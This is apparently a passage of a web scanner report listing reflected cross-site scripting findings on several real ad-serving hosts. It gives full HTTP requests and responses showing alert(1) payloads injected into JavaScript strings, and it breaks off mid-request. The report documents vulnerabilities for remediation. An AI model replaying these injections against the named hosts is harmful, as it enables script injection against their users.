Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8925c'%3balert(1)//d2520030bec was submitted in the redir parameter. This input was echoed as 8925c';alert(1)//d2520030bec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.rev_lee&size=300x250&imp_id=cm-77237941_1304437410,11fda490648f83c&referrer=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert%28%2522DORK%2522%29-%2522f8cf8d87874%3D1&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_lee%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-77237941_1304437410%2C11fda490648f83c%2CMiscellaneous%2Cax.{PRICEBUCKET}%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D975335%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D0.3433780161396228%3F8925c'%3balert(1)//d2520030bec HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: uuid2=4712109102545615229; icu=ChII3pUBEAoYBiAGKAYw27_K6gQQ27_K6gQYBQ..; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmx=5E%IV!kszdkNSo6@-y`OawuG(Le#W21[=q; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 04-May-2011 15:45:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:45:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:45:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII7IABEAoYASABKAEwiMaA7gQQiMaA7gQYAA..; path=/; expires=Mon, 01-Aug-2011 15:45:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb91751=5_[r^208WM*c3rB20/dR9rOOE?enc=KVyPwvUoDEDy0k1iEFgJQAAAAKCZmQlA8tJNYhBYCUApXI_C9SgMQFhEijVWrHZufbkdUEPGZEEHI8BNAAAAACk9AwA3AQAAZAAAAAIAAAAGEgUABF8AAAEAAABVU0QAVVNEACwB-gAtHgAANAcBAgUCAAUAAAAAxxvheAAAAAA.&tt_code=cm.rev_lee&udj=uf%28%27a%27%2C+27%2C+1304437511%29%3Buf%28%27g%27%2C+1079%2C+1304437511%29%3Buf%28%27r%27%2C+332294%2C+1304437511%29%3Bppv%2882%2C+%277959738877689349208%27%2C+1304437511%2C+1314805511%2C+66646%2C+24324%29%3Bppv%2884%2C+%277959738877689349208%27%2C+1304437511%2C+1314805511%2C+66646%2C+24324%29%3Bppv%2811%2C+%277959738877689349208%27%2C+1304437511%2C+1314805511%2C+66646%2C+24324%29%3Bppv%2882%2C+%277959738877689349208%27%2C+1304437511%2C+1314805511%2C+66646%2C+24324%29%3Bppv%2884%2C+%277959738877689349208%27%2C+1304437511%2C+1314805511%2C+66646%2C+24324%29%3Bppv%2887%2C+%277959738877689349208%27%2C+1304437511%2C+1304523911%2C+66646%2C+24324%29%3Bppv%28619%2C+%277959738877689349208%27%2C+1304437511%2C+1304523911%2C+66646%2C+24324%29%3Bppv%28620%2C+%277959738877689349208%27%2C+1304437511%2C+1304523911%2C+66646%2C+24324%29%3Bppv%28621%2C+%277959738877689349208%27%2C+1304437511%2C+1304523911%2C+66646%2C+24324%29%3B&cnd=!jBesJgjWiAQQhqQUGAAghL4BKAAxmpmZyfUoDEBCEwgAEAAYACABKP7__________wFCCghSEAAYACADKAFCCghUEAAYACADKAFIAVAAWK08YABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E66646; path=/; expires=Wed, 04-May-2011 15:45:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:45:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmx=5E%IV!kszdkNSo6@-y`/AGF4HtVmG.cyIxd`r.W; path=/; expires=Mon, 01-Aug-2011 15:45:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 03 May 2011 15:45:12 GMT
Content-Length: 527

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_lee/;net=cm;u=,cm-77237941_1304437410,11fda490648f83c,Miscellaneous,ax.300;;cmw=owl;sz=300x250;net=cm;ord1=975335;contx=Miscellaneous;an=300;dc=w;btg=;ord=0.3433780161396228?8925c';alert(1)//d2520030bec">
...[SNIP]...

6.21. http://k.collective-media.net/cmadj/cm.rev_lee/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.rev_lee/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dee38'-alert(1)-'19ab35be67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rev_leedee38'-alert(1)-'19ab35be67/;sz=300x250;net=cm;ord=0.3433780161396228;ord1=975335;cmpgurl=http%253A//www.maysville-online.com/content/%253Fc3a2e%252522-alert%2528%252522DORK%252522%2529-%252522f8cf8d87874%253D1? HTTP/1.1
Host: k.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: JY57=CT; cli=11fda490648f83c; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:43:32 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:32 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:32 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:43:32 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 03-May-2011 23:43:32 GMT
Content-Length: 8159

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-64518349_1304437412","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_leedee38'-alert(1)-'19ab35be67&size=300x250&imp_id=cm-64518349_1304437412,11fda490648f83c&referrer=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert%28%2522DORK%2522%29-%2522f8cf8d87874%3D1&redir=http%3A%2F%2Fad
...[SNIP]...

6.22. http://k.collective-media.net/cmadj/cm.rev_lee/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.rev_lee/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8487b'-alert(1)-'4ebfefb46d0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rev_lee/;sz=8487b'-alert(1)-'4ebfefb46d0&01RI=0B3057BAC5C6A5A&01NA= HTTP/1.1
Host: k.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: JY57=CT-1; cli=11fda490648f83c; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:43:31 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:31 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:31 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:43:31 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 03-May-2011 23:43:31 GMT
Content-Length: 8077

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-41783944_1304437411","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_lee&size=8487b'-alert(1)-'4ebfefb46d0&01RI=0B3057BAC5C6A5A&01NA=&imp_id=cm-41783944_1304437411,11fda490648f83c&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_lee%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-41783944_1304437411%2C11fda490648f
...[SNIP]...

6.23. http://servedby.flashtalking.com/imp/3/15881 [124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/15881

Issue detail

The value of the 124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac2fb"-alert(1)-"a54c5de421a was submitted in the 124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=ac2fb"-alert(1)-"a54c5de421a&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:36 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=12187B0AA1E5A3";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:42:36 GMT
Content-Length: 565
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175171010000 (MII-APC/1.6)


var ftGUID_124094="12187B0AA1E5A3";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=ac2fb"-alert(1)-"a54c5de421a&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src=
...[SNIP]...

6.24. http://servedby.flashtalking.com/imp/3/15881 [cachebuster parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/15881

Issue detail

The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dca13"-alert(1)-"121437d18da was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509dca13"-alert(1)-"121437d18da HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:43:46 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=121863BBB2F4CF";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:43:46 GMT
Content-Length: 565
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175164010000 (MII-APC/1.6)


var ftGUID_124094="121863BBB2F4CF";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509dca13"-alert(1)-"121437d18da";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/xre/12/124094/184545/js/j
...[SNIP]...

6.25. http://servedby.flashtalking.com/imp/3/15881 [ftadz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/15881

Issue detail

The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83c50"-alert(1)-"74ea3ccc27 was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=83c50"-alert(1)-"74ea3ccc27&ftscw=&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:43:20 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1218F3A63D70DF";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:43:20 GMT
Content-Length: 564
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175171010000 (MII-APC/1.6)


var ftGUID_124094="1218F3A63D70DF";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=83c50"-alert(1)-"74ea3ccc27&ftscw=&cachebuster=866904.4431923509";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http://cdn.flash
...[SNIP]...

6.26. http://servedby.flashtalking.com/imp/3/15881 [ftscw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/15881

Issue detail

The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 857f8"-alert(1)-"646183f6787 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=857f8"-alert(1)-"646183f6787&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:43:33 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=121823E8BDA6DF";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:43:33 GMT
Content-Length: 565
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw061007 (MII-APC/1.6)


var ftGUID_124094="121823E8BDA6DF";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=857f8"-alert(1)-"646183f6787&cachebuster=866904.4431923509";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking
...[SNIP]...

6.27. http://servedby.flashtalking.com/imp/3/15881 [ftx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/15881

Issue detail

The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39f9c"-alert(1)-"55afaf56e4b was submitted in the ftx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=39f9c"-alert(1)-"55afaf56e4b&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:50 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1218792D86C7D1";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:42:50 GMT
Content-Length: 565
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175164010000 (MII-APC/1.6)


var ftGUID_124094="1218792D86C7D1";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=39f9c"-alert(1)-"55afaf56e4b&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http
...[SNIP]...

6.28. http://servedby.flashtalking.com/imp/3/15881 [fty parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/15881

Issue detail

The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9762c"-alert(1)-"75177b00e03 was submitted in the fty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=9762c"-alert(1)-"75177b00e03&ftadz=&ftscw=&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:43:07 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1218E15DFCBA8F";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:43:07 GMT
Cache-Control: no-cache, no-store
Content-Length: 565
pragma: no-cache
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175164010000 (MII-APC/1.6)


var ftGUID_124094="1218E15DFCBA8F";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=9762c"-alert(1)-"75177b00e03&ftadz=&ftscw=&cachebuster=866904.4431923509";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http://cd
...[SNIP]...

6.29. http://servedby.flashtalking.com/imp/3/15881 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/15881

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b205c"-alert(1)-"e06a7be33a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509&b205c"-alert(1)-"e06a7be33a0=1 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:43:59 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=12183D9E4BB119";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:43:59 GMT
Content-Length: 568
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175171010000 (MII-APC/1.6)


var ftGUID_124094="12183D9E4BB119";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509&b205c"-alert(1)-"e06a7be33a0=1";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/xre/12/124094/184537/js
...[SNIP]...

6.30. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8424e"%3balert(1)//7487bfd2194 was submitted in the action parameter. This input was echoed as 8424e";alert(1)//7487bfd2194 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD8424e"%3balert(1)//7487bfd2194&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
